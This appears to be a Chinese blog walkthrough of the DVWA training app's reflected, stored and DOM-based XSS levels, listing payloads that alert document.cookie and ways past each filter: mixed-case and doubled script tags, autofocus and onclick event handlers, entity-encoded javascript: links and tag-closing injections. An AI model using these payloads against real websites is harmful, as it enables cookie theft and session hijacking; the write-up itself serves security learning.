web-xss-dvwa

偷吃"游"的阿彪2023-08-14 15:07

目录

xss(reflected)

low

medium

high

xss(store)

low

medium

high

xss(dom)

low

medium

high

xss(reflected)

low

没有什么过滤,直接用最普通的标签就可以了

复制代码 
http://127.0.0.1/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E#

medium

大小写绕过

复制代码 
?name=<SCript>alert(document.cookie)<%2FSCript>

双写绕过

复制代码 
?name=<sc<script>ript>alert(document.cookie)<%2Fscript>

high

过滤规则:

name = preg_replace( '/\<(.*)s(.* )c(.*)r(.* )i(.*)p(.*)t/i', '', _GET[ 'name' ] ); 对任何模式的script都过滤了。

①换标签进行过滤

知识点:

autofocus 属性是一个 boolean(布尔) 属性。

autofocus 属性规定当页面加载时按钮应当自动地获得焦点。

payload:

复制代码 
?name=<a href="x" onfocus="alert(document.cookie)"; autofocus="">xss</a>

②进行html编码

复制代码 
<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;">test</a>

gpt直接转就可以了

xss(store)

low

直接再内容框中输入基本的xss语言就可以了

复制代码 
<script>alert(document.cookie)</script>

medium

先修改name的长度,让其写的下xss语句。再medium难度中,只能将代码写在name,写在内容里面是实现不了的

大小写绕过

复制代码 
<SCript>alert(document.cookie)</SCript>

双写绕过

复制代码 
<scr<script>ipt>alert(document.cookie)</script>

high

先修改name的长度,让其写的下xss语句。再high难度中,只能将代码写在name,写在内容里面是实现不了的

high难度要换标签才能实现,script完全被过滤掉了

复制代码 
<a href="x" onclick=alert(document.cookie)>xss</a>

<img src="x" onclick=alert(document.cookie)>

xss(dom)

low

直接写上最普通的xss语句就可以了

复制代码 
?default=<script>alert(document.cookie)</scrip

medium

select标签中只允许内嵌option标签,a、img标签嵌套再option标签中是无法实现器作用的。所以要先闭合option标签,然后再闭合select标签,这样子就可以了

复制代码 
?default="></option></select><a href="x" onclick=alert(1)>xss</a>

high

源代码

这里采用了白名单过滤的方法,只允许default值为 French English German Spanish 其中一个。

代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。此时,在URL中添加注释#注释的内容不会提交到服务器,而是在浏览器执行

php 复制代码 
<?php
 
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
 
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
 
?>

payload:

复制代码 
?default=English#<script>alert(document.cookie)</script>
相关推荐
sorryhc3 分钟前
0~1构建一个mini blot.new(无AI版本)
前端·前端框架·openai
南方者18 分钟前
文心文心,其利锻心!这个古风射覆,它帅到我了!文心快码 3.5S
前端·敏捷开发·文心快码
永日4567019 分钟前
学习日记-CSS-day53-9.11
前端·css·学习
云枫晖20 分钟前
JS核心知识-this的指向
前端·javascript
magnet22 分钟前
用img标签渲染的svg VS 直接使用svg标签,有什么区别?
前端·html
ze_juejin24 分钟前
createComponent的environmentInjector详解
前端
云舟吖25 分钟前
基于 electron-vite 从零到一搭建桌面端应用
前端·架构
ze_juejin25 分钟前
CSS backdrop-filter 属性详解
前端
不爱编程的小方27 分钟前
响应式布局
前端·css3
热门推荐
01conda中设置镜像地址(附所有可换的地址)02UV安装并设置国内源03保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)04A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程05UV 工具安装与国内镜像源配置指南06GitHub 镜像站点07突破百度网盘的下载限速,两种方法教会你【超详细】08KGG转MP3工具|非KGM文件|解密音频09教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员1046个Nano-banana 精选提示词,持续更新中